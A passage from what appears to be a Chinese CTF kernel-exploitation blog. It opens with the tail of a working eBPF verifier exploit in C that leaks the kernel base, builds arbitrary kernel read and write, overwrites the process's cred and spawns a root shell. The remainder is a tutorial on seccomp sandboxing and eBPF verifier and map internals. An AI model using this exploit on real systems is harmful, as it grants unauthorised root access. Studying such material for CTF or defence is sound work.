BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)

size_t fake_ops_addr;
size_t map_addr;
size_t map_ops_addr;
size_t current_task;
size_t current_cred;

static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

void make_arbitrary_write_ops(int map_fd){
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
MAKE_ARBITRARY_WRITE_OPS(map_fd),
BPF_EXIT_INSN()};
int key;
size_t per_ops_ptr, value[0x1000], value_idx;
struct bpf_map_ops *ops_data;

fake_ops_addr = map_addr + 0x110 + MAP_SIZE; /* save fake ops addr into map */

value_idx = 0; /* read ops */
for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
value[value_idx++] = per_ops_ptr;
}

ops_data = (struct bpf_map_ops *)value; /* load ops */
ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
key = 1;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

key = 2;
value[0] = fake_ops_addr;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

int print_hex(void *p, int size){
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *)){
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

int main(int argc , char **argv, char **envp)
{
int map_fd;
int key;
size_t value[0x1000];
int log_fd;

map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
if (map_fd < 0) {
err_exit("FAILED to create eBPF map!");
}

key = 0;
value[0] = 0;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
err_exit("FAILED to load value into map!");
}

puts("leak map_ops_addr");
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
LEAK_MAP_OPS(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
map_ops_addr = value[0];
printf("map_ops_addr: 0x%lx\n", map_ops_addr);

kernel_offset = map_ops_addr - ARRAY_MAP_OPS;
kernel_base += kernel_offset;
init_cred = INIT_CRED + kernel_offset;
printf("map_ops_addr: 0x%lx\n", map_ops_addr);
printf("kernel_base: 0x%lx\n", kernel_base);
printf("kernel_offset: 0x%lx\n", kernel_offset);

puts("leak map_addr");
struct bpf_insn prog2[] = {
TRIGGER_VULN(map_fd),
LEAK_MAP_ADDR(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog2, sizeof(prog2) / sizeof(prog2[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
map_addr = value[0] - 0x110;
printf("map_addr: 0x%lx\n", map_addr);

size_t next_task = INIT_TASK + kernel_offset + 0x818;
size_t data;

prctl(PR_SET_NAME, "11111111");
do{
next_task = read_arbitrary_addr(map_fd, next_task);
data = read_arbitrary_addr(map_fd, next_task + 0x2d0);
} while (data != *(size_t *)"11111111");

current_task = next_task - 0x818;
current_cred = read_arbitrary_addr(map_fd, current_task + 0xad8);
printf("current_task: 0x%lx\n", current_task);
printf("current_cred: 0x%lx\n", current_cred);

make_arbitrary_write_ops(map_fd);

key = 0;
value[0] = -1;
for (int i = 0; i < 8; i++){
if (bpf_map_update_elem(map_fd, &key, &value[0], current_cred + 4 + 4 * i) < 0){
printf("\033[31m\033[1m[x] Failed to ovwerwrite no.%d\033[0m\n", i);
err_exit("FAILED to call ops->map_push_elem()!");
}
}
get_root_shell();

return 0;
}

沙盒基础知识

在 CTF 的 pwn 题中一般有两种函数调用方式实现沙盒机制:

使用 prctl 系统调用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include<stdio.h>
#include<fcntl.h>
#include<unistd.h>
#include<stddef.h>
#include<linux/seccomp.h>
#include<linux/filter.h>
#include<sys/prctl.h>
#include<linux/bpf.h>
#include<sys/types.h>

int main(){
struct sock_filter filter[]={
BPF_STMT(BPF_LD|BPF_W|BPF_ABS, 0),
BPF_JUMP(BPF_JMP|BPF_JEQ, 59, 1, 0),
BPF_JUMP(BPF_JMP|BPF_JGE, 0, 1, 0),
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ERRNO),
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
};
struct sock_fprog prog={
.len=sizeof(filter)/sizeof(filter[0]),
.filter=filter,
};
prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
syscall(59,"/bin/sh",NULL,NULL);
return 0;
}
1
2
3
4
5
0000: 0x20 0x00 0x00 0x00000000  A = sys_number
0001: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0003
0002: 0x35 0x01 0x00 0x00000000 if (A >= 0x0) goto 0004
0003: 0x06 0x00 0x00 0x00050000 return ERRNO(0)
0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW

使用 seccomp 库函数:

1
2
3
4
5
6
7
8
9
10
11
12
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>

int main(void){
scmp_filter_ctx ctx;
ctx = seccomp_init(SCMP_ACT_ALLOW);
seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
seccomp_load(ctx);
syscall(59,"/bin/sh",NULL,NULL);
return 0;
}
1
2
3
4
5
6
7
8
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL
  • seccomp_load 函数进行逆向分析,可以发现其底层也是使用 prctl 系统调用
1
v17 = prctl(38LL, 1LL, 0LL, 0LL, 0LL); /* PR_SET_NO_NEW_PRIVS */
1
v14 = prctl(22LL, 2LL, v10, v10, v7); /* PR_SET_SECCOMP */

prctl 系统调用

prctl(Process Control Language,进程控制语言)是一个 Linux 系统调用的一个重要工具,它可以对进程进行各种管理和控制操作

prctl 提供了对进程的许多控制和设置,使用第一个参数来指定其功能:

  • 设置进程的权限级别
  • 设置进程的调度参数
  • 设置进程的内存限制
  • 设置进程的 CPU 时间限制
  • 设置进程的信号处理
  • 设置进程的资源限制
  • 设置进程的属性
  • 获取进程的属性

沙盒需要的 prctl 功能如下:

  • prctl(PR_SET_NO_NEW_PRIVS):命名空间内以 CAP_SYS_ADMIN 权限运行(子进程会保证不会赋予运行进程新的权限)
  • prctl(PR_SET_SECCOMP):第二个参数是设置的过滤模式,第三个参数是设置的过滤规则
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
unsigned long, arg4, unsigned long, arg5)
{
struct task_struct *me = current;
unsigned char comm[sizeof(me->comm)];
long error;

error = security_task_prctl(option, arg2, arg3, arg4, arg5);
if (error != -ENOSYS)
return error;

error = 0;
switch (option) {
......

case PR_SET_SECCOMP:
error = prctl_set_seccomp(arg2, (char __user *)arg3);
break;

......

case PR_SET_NO_NEW_PRIVS:
if (arg2 != 1 || arg3 || arg4 || arg5)
return -EINVAL;

task_set_no_new_privs(current);
break;

......

default:
error = -EINVAL;
break;
}
return error;
}

核心函数 prctl_set_seccomp 的调用链如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
long prctl_set_seccomp(unsigned long seccomp_mode, void __user *filter)
{
unsigned int op;
void __user *uargs;

switch (seccomp_mode) {
case SECCOMP_MODE_STRICT: /* 严格模式(所有的syscall都被检查和过滤) */
op = SECCOMP_SET_MODE_STRICT;
uargs = NULL;
break;
case SECCOMP_MODE_FILTER: /* 过滤模式(所有的syscall都被允许,但是某些syscall可能会被过滤器拒绝) */
op = SECCOMP_SET_MODE_FILTER;
uargs = filter;
break;
default:
return -EINVAL;
}

return do_seccomp(op, 0, uargs);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static long do_seccomp(unsigned int op, unsigned int flags,
void __user *uargs)
{
switch (op) {
case SECCOMP_SET_MODE_STRICT: /* 严格模式 */
if (flags != 0 || uargs != NULL)
return -EINVAL;
return seccomp_set_mode_strict();
case SECCOMP_SET_MODE_FILTER: /* 过滤模式 */
return seccomp_set_mode_filter(flags, uargs);
case SECCOMP_GET_ACTION_AVAIL: /* 用于查询特定的action是否被内核支持 */
if (flags != 0)
return -EINVAL;

return seccomp_get_action_avail(uargs);
case SECCOMP_GET_NOTIF_SIZES: /* 获取指定进程的安全上下文通知大小 */
if (flags != 0)
return -EINVAL;

return seccomp_get_notif_sizes(uargs);
default:
return -EINVAL;
}
}

这里我们重点分析过滤模式的 seccomp_set_mode_filter 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
static long seccomp_set_mode_filter(unsigned int flags,
const char __user *filter)
{
const unsigned long seccomp_mode = SECCOMP_MODE_FILTER;
struct seccomp_filter *prepared = NULL;
long ret = -EINVAL;
int listener = -1;
struct file *listener_f = NULL;

......

prepared = seccomp_prepare_user_filter(filter); /* 在持有锁之前准备新过滤器 */
if (IS_ERR(prepared))
return PTR_ERR(prepared);

if (flags & SECCOMP_FILTER_FLAG_NEW_LISTENER) {
listener = get_unused_fd_flags(O_CLOEXEC);
if (listener < 0) {
ret = listener;
goto out_free;
}

listener_f = init_listener(prepared); /* 初始化一个监听器,用于接收来自内核的通知和事件 */
if (IS_ERR(listener_f)) {
put_unused_fd(listener);
ret = PTR_ERR(listener_f);
goto out_free;
}
}

if (flags & SECCOMP_FILTER_FLAG_TSYNC &&
mutex_lock_killable(&current->signal->cred_guard_mutex))
goto out_put_fd;

spin_lock_irq(&current->sighand->siglock);

if (!seccomp_may_assign_mode(seccomp_mode))
goto out;

if (has_duplicate_listener(prepared)) { /* 检查一个进程是否已经有一个监听器 */
ret = -EBUSY;
goto out;
}

ret = seccomp_attach_filter(flags, prepared); /* 将一个过滤器附加到受限制的安全上下文中 */
if (ret)
goto out;
/* Do not free the successfully attached filter. */
prepared = NULL;

seccomp_assign_mode(current, seccomp_mode, flags); /* 将一个受限制的安全上下文分配给一个进程(current当前进程) */
out:
spin_unlock_irq(&current->sighand->siglock);
if (flags & SECCOMP_FILTER_FLAG_TSYNC)
mutex_unlock(&current->signal->cred_guard_mutex);
out_put_fd:
if (flags & SECCOMP_FILTER_FLAG_NEW_LISTENER) {
if (ret) {
listener_f->private_data = NULL;
fput(listener_f); /* 释放对文件的最后一个引用 */
put_unused_fd(listener); /* 说明目标文件描述符已经不再使用 */
seccomp_notify_detach(prepared);
} else {
fd_install(listener, listener_f);
ret = listener;
}
}
out_free:
seccomp_filter_free(prepared);
return ret;
}
  • 其最核心的工作就是在 current->seccomp.filter 中注册过滤器:
1
2
3
filter->prev = current->seccomp.filter;
current->seccomp.filter = filter;
atomic_inc(&current->seccomp.filter_count);

如果使用了 FILTER 模式,则调用 seccomp_run_filters 函数来进行所有指令判断过滤,系统调用号作为参数传递,根据返回值来进行后续处理

这里我们分析一下从 syscall 入口函数 entry_SYSCALL_compatseccomp_run_filters 的调用链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
SYM_CODE_START(entry_SYSCALL_compat)
UNWIND_HINT_EMPTY
/* Interrupts are off on entry. */
swapgs

/* Stash user ESP */
movl %esp, %r8d

/* Use %rsp as scratch reg. User ESP is stashed in r8 */
SWITCH_TO_KERNEL_CR3 scratch_reg=%rsp
......
movq %rsp, %rdi
call do_fast_syscall_32
......
SWITCH_TO_USER_CR3_NOSTACK scratch_reg=%r8 scratch_reg2=%r9

xorl %r8d, %r8d
xorl %r9d, %r9d
xorl %r10d, %r10d
swapgs
sysretl
SYM_CODE_END(entry_SYSCALL_compat)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static noinstr bool __do_fast_syscall_32(struct pt_regs *regs)
{
unsigned int nr = syscall_32_enter(regs);
int res;

......

/* The case truncates any ptrace induced syscall nr > 2^32 -1 */
nr = (unsigned int)syscall_enter_from_user_mode_work(regs, nr);

/* Now this is just like a normal syscall. */
do_syscall_32_irqs_on(regs, nr);
syscall_exit_to_user_mode(regs);
return true;
}
1
2
3
4
long syscall_enter_from_user_mode_work(struct pt_regs *regs, long syscall)
{
return __syscall_enter_from_user_work(regs, syscall);
}
1
2
3
4
5
6
7
8
9
10
11
static __always_inline long
__syscall_enter_from_user_work(struct pt_regs *regs, long syscall)
{
unsigned long ti_work;

ti_work = READ_ONCE(current_thread_info()->flags);
if (ti_work & SYSCALL_ENTER_WORK)
syscall = syscall_trace_enter(regs, syscall, ti_work);

return syscall;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static long syscall_trace_enter(struct pt_regs *regs, long syscall,
unsigned long ti_work)
{
long ret = 0;

......

if (ti_work & _TIF_SECCOMP) {
ret = __secure_computing(NULL);
if (ret == -1L)
return ret;
}

......

return ret ? : syscall;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
int __secure_computing(const struct seccomp_data *sd)
{
int mode = current->seccomp.mode;
int this_syscall;

if (IS_ENABLED(CONFIG_CHECKPOINT_RESTORE) &&
unlikely(current->ptrace & PT_SUSPEND_SECCOMP))
return 0;

this_syscall =
sd ? sd->nr : syscall_get_nr(current, task_pt_regs(current));

switch (mode) {
case SECCOMP_MODE_STRICT:
__secure_computing_strict(this_syscall); /* may call do_exit */
return 0;
case SECCOMP_MODE_FILTER:
return __seccomp_filter(this_syscall, sd, false);
default:
BUG();
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static int __seccomp_filter(int this_syscall, const struct seccomp_data *sd,
const bool recheck_after_trace)
{
u32 filter_ret, action;
struct seccomp_filter *match = NULL;
int data;
struct seccomp_data sd_local;

rmb();

if (!sd) {
populate_seccomp_data(&sd_local);
sd = &sd_local;
}

filter_ret = seccomp_run_filters(sd, &match);

......

skip:
seccomp_log(this_syscall, 0, action, match ? match->log : false);
return -1;
}

指令过滤函数 seccomp_run_filters 的源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
static u32 seccomp_run_filters(const struct seccomp_data *sd,
struct seccomp_filter **match)
{
u32 ret = SECCOMP_RET_ALLOW;
/* Make sure cross-thread synced filter points somewhere sane. */
struct seccomp_filter *f = READ_ONCE(current->seccomp.filter);

/* Ensure unexpected behavior doesn't result in failing open. */
if (WARN_ON(f == NULL))
return SECCOMP_RET_KILL_PROCESS;

/*
* All filters in the list are evaluated and the lowest BPF return
* value always takes priority (ignoring the DATA).
*/
for (; f; f = f->prev) {
u32 cur_ret = bpf_prog_run_pin_on_cpu(f->prog, sd); /* 用于运行BPF程序的函数 */

if (ACTION_ONLY(cur_ret) < ACTION_ONLY(ret)) {
ret = cur_ret;
*match = f;
}
}
return ret;
}
  • bpf_prog_run_pin_on_cpu 是一个用于运行 BPF 程序的函数,该函数将 BPF 程序加载到指定 CPU 的内存中,并将其附加到指定 CPU 的运行队列中
1
2
3
4
5
6
7
8
9
10
static inline u32 bpf_prog_run_pin_on_cpu(const struct bpf_prog *prog,
const void *ctx)
{
u32 ret;

migrate_disable(); /* 禁用内核进程迁移 */
ret = __BPF_PROG_RUN(prog, ctx, bpf_dispatcher_nop_func); /* 运行BPF程序 */
migrate_enable(); /* 启用内核进程迁移 */
return ret;
}

eBPF 虚拟机

Linux 下 eBPF 的整体架构如下图所示:

  • 传入:用户进程首先在用户空间编写相应的 BPF 字节码程序,传入内核
  • 检查:内核通过 verifier 对字节码程序进行安全性检查
  • 编译 or 解释:通过检查后便通过 JIT 编译运行,或者直接解释运行 BPF 字节码
  • 映射:用以保存数据的通用结构,可以在不同的 eBPF 程序之间或是用户进程与内核间共享数据(不同的 eBPF 程序之间可以共享同一个映射)

eBPF 底层是一个使用 RISC 指令集的虚拟机,使用11个64位寄存器和一个固定大小为512字节的栈:

  • 其中9个寄存器是通用寄存器
  • 一个只读栈帧寄存器

寄存器总是64位大小,在32位机器上会默认把前32位置零,这也为 eBPF 提供了交叉编译的兼容性,各个寄存器的功能如下:

  • R0: RAX,存放函数返回值或程序退出状态码
  • R1: RDI,第一个实参
  • R2: RSI,第二个实参
  • R3: RDX,第三个实参
  • R4: RCX,第四个实参
  • R5: R8,第五个实参
  • R6: RBX,callee saved
  • R7: R13,callee saved
  • R8: R14,callee saved
  • R9: R15,callee saved
  • R10: RBP,只读栈帧

在 eBPF 中,一个寄存器的状态信息使用 bpf_reg_state 进行表示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
struct bpf_reg_state {
/* Ordering of fields matters. See states_equal() */
enum bpf_reg_type type; /* 记录寄存器类型 */
/* Fixed part of pointer offset, pointer types only */
s32 off;
union {
/* valid when type == PTR_TO_PACKET */
int range;

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;

/* for PTR_TO_BTF_ID */
struct {
struct btf *btf;
u32 btf_id;
};

u32 mem_size; /* for PTR_TO_MEM | PTR_TO_MEM_OR_NULL */

/* Max size from any of the above. */
struct {
unsigned long raw1;
unsigned long raw2;
} raw;
};
/* For PTR_TO_PACKET, used to find other pointers with the same variable
* offset, so they can share range knowledge.
* For PTR_TO_MAP_VALUE_OR_NULL this is used to share which map value we
* came from, when one is tested for != NULL.
* For PTR_TO_MEM_OR_NULL this is used to identify memory allocation
* for the purpose of tracking that it's freed.
* For PTR_TO_SOCKET this is used to share which pointers retain the
* same reference to the socket, to determine proper reference freeing.
*/
u32 id;
/* PTR_TO_SOCKET and PTR_TO_TCP_SOCK could be a ptr returned
* from a pointer-cast helper, bpf_sk_fullsock() and
* bpf_tcp_sock().
*
* Consider the following where "sk" is a reference counted
* pointer returned from "sk = bpf_sk_lookup_tcp();":
*
* 1: sk = bpf_sk_lookup_tcp();
* 2: if (!sk) { return 0; }
* 3: fullsock = bpf_sk_fullsock(sk);
* 4: if (!fullsock) { bpf_sk_release(sk); return 0; }
* 5: tp = bpf_tcp_sock(fullsock);
* 6: if (!tp) { bpf_sk_release(sk); return 0; }
* 7: bpf_sk_release(sk);
* 8: snd_cwnd = tp->snd_cwnd; // verifier will complain
*
* After bpf_sk_release(sk) at line 7, both "fullsock" ptr and
* "tp" ptr should be invalidated also. In order to do that,
* the reg holding "fullsock" and "sk" need to remember
* the original refcounted ptr id (i.e. sk_reg->id) in ref_obj_id
* such that the verifier can reset all regs which have
* ref_obj_id matching the sk_reg->id.
*
* sk_reg->ref_obj_id is set to sk_reg->id at line 1.
* sk_reg->id will stay as NULL-marking purpose only.
* After NULL-marking is done, sk_reg->id can be reset to 0.
*
* After "fullsock = bpf_sk_fullsock(sk);" at line 3,
* fullsock_reg->ref_obj_id is set to sk_reg->ref_obj_id.
*
* After "tp = bpf_tcp_sock(fullsock);" at line 5,
* tp_reg->ref_obj_id is set to fullsock_reg->ref_obj_id
* which is the same as sk_reg->ref_obj_id.
*
* From the verifier perspective, if sk, fullsock and tp
* are not NULL, they are the same ptr with different
* reg->type. In particular, bpf_sk_release(tp) is also
* allowed and has the same effect as bpf_sk_release(sk).
*/
u32 ref_obj_id;
/* For scalar types (SCALAR_VALUE), this represents our knowledge of
* the actual value.
* For pointer types, this represents the variable part of the offset
* from the pointed-to object, and is shared with all bpf_reg_states
* with the same id as us.
*/
struct tnum var_off;
/* Used to determine if any memory access using this register will
* result in a bad access.
* These refer to the same value as var_off, not necessarily the actual
* contents of the register.
*/
s64 smin_value; /* minimum possible (s64)value */
s64 smax_value; /* maximum possible (s64)value */
u64 umin_value; /* minimum possible (u64)value */
u64 umax_value; /* maximum possible (u64)value */
s32 s32_min_value; /* minimum possible (s32)value */
s32 s32_max_value; /* maximum possible (s32)value */
u32 u32_min_value; /* minimum possible (u32)value */
u32 u32_max_value; /* maximum possible (u32)value */
/* parentage chain for liveness checking */
struct bpf_reg_state *parent;
/* Inside the callee two registers can be both PTR_TO_STACK like
* R1=fp-8 and R2=fp-8, but one of them points to this function stack
* while another to the caller's stack. To differentiate them 'frameno'
* is used which is an index in bpf_verifier_state->frame[] array
* pointing to bpf_func_state.
*/
u32 frameno;
/* Tracks subreg definition. The stored value is the insn_idx of the
* writing insn. This is safe because subreg_def is used before any insn
* patching which only happens after main verification finished.
*/
s32 subreg_def;
enum bpf_reg_liveness live;
/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
bool precise;
};

当 eBPF 字节码载入到内核中后,verifier 会对 eBPF 字节码进行一系列的检查,主要关注以下几个字段:

  • smin_valuesmax_value:64 位有符号的值的可能取值边界
  • umin_valueumax_value:64 位无符号的值的可能取值边界
  • s32_min_values32_max_value:32 位有符号的值的可能取值边界
  • u32_min_valueu32_max_value:32 位无符号的值的可能取值边界

核心检查函数就是 bpf_check,一个静态代码分析器:

  • 逐条遍历 eBPF 程序中的指令并更新寄存器 / 堆栈的状态,条件分支的所有路径都会被分析,直到 bpf_exit 指令
  • 这其实是一个模拟执行的过程,verifier 会推测寄存器的边界值,检查其是否符合规则
  • 模拟通过后才能正常加载 eBPF 程序

在其中用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

当 eBPF 字节码载入到内核中后,内核最终会使用一个 bpf_prog 结构体来表示一个 eBPF 程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
struct bpf_prog {
u16 pages; /* Number of allocated pages */
u16 jited:1, /* Is our filter JIT'ed? */
jit_requested:1,/* archs need to JIT the prog */
gpl_compatible:1, /* Is filter GPL compatible? */
cb_access:1, /* Is control block accessed? */
dst_needed:1, /* Do we need dst entry? */
blinded:1, /* Was blinded */
is_func:1, /* program is a bpf function */
kprobe_override:1, /* Do we override a kprobe? */
has_callchain_buf:1, /* callchain buffer allocated? */
enforce_expected_attach_type:1, /* Enforce expected_attach_type checking at attach time */
call_get_stack:1; /* Do we call bpf_get_stack() or bpf_get_stackid() */
enum bpf_prog_type type; /* Type of BPF program */
enum bpf_attach_type expected_attach_type; /* For some prog types */
u32 len; /* Number of filter blocks */
u32 jited_len; /* Size of jited insns in bytes */
u8 tag[BPF_TAG_SIZE];
struct bpf_prog_aux *aux; /* Auxiliary fields */
struct sock_fprog_kern *orig_prog; /* Original BPF program */
unsigned int (*bpf_func)(const void *ctx,
const struct bpf_insn *insn);
/* Instructions for interpreter */
struct sock_filter insns[0];
struct bpf_insn insnsi[];
};

接着就是编译,解释 eBPF 字节码,生成 bpf map 并记录在 bpf_reg_state->map_ptr

bpf map 是一个通用的用以储存不同种类数据的结构,用以在用户进程与 eBPF 程序、eBPF 程序与 eBPF 程序之间进行数据共享(这些数据以二进制形式储存,因此用户在创建时只需要指定 key 与 value 的 size)

核心结构体 bpf_map 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
struct bpf_map {
/* The first two cachelines with read-mostly members of which some
* are also accessed in fast-path (e.g. ops, max_entries).
*/
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type; /* map的数据结构类型 */
u32 key_size; /* 以字节为单位的用以索引一个元素的key的size(在数组映射中使用) */
u32 value_size; /* 以字节为单位的每个元素的size */
u32 max_entries; /* map中entries的最大数量 */
u32 map_flags; /* 描述map的独特特征(例如是否整个map的内存应被预先分配等) */
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
#ifdef CONFIG_MEMCG_KMEM
struct mem_cgroup *memcg;
#endif
char name[BPF_OBJ_NAME_LEN];
u32 btf_vmlinux_value_type_id;
bool bypass_spec_v1;
bool frozen; /* write-once; write-protected by freeze_mutex */
/* 22 bytes hole */

/* The 3rd and 4th cacheline with misc members to avoid false sharing
* particularly with refcounting.
*/
atomic64_t refcnt ____cacheline_aligned;
atomic64_t usercnt;
struct work_struct work;
struct mutex freeze_mutex;
u64 writecnt; /* writable mmap cnt; protected by freeze_mutex */
};

bpf map 有多种类型,记录于 bpf_map_type 枚举中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
enum bpf_map_type {
BPF_MAP_TYPE_UNSPEC,
BPF_MAP_TYPE_HASH, /* 以哈希表形式存储键值对(最常见) */
BPF_MAP_TYPE_ARRAY, /* 以数组形式存储键值对,key即为数组下标,value初始化为'0' */
BPF_MAP_TYPE_PROG_ARRAY, /* 特殊的数组映射,value为其他eBPF程序的文件描述符 */
BPF_MAP_TYPE_PERF_EVENT_ARRAY,
BPF_MAP_TYPE_PERCPU_HASH,
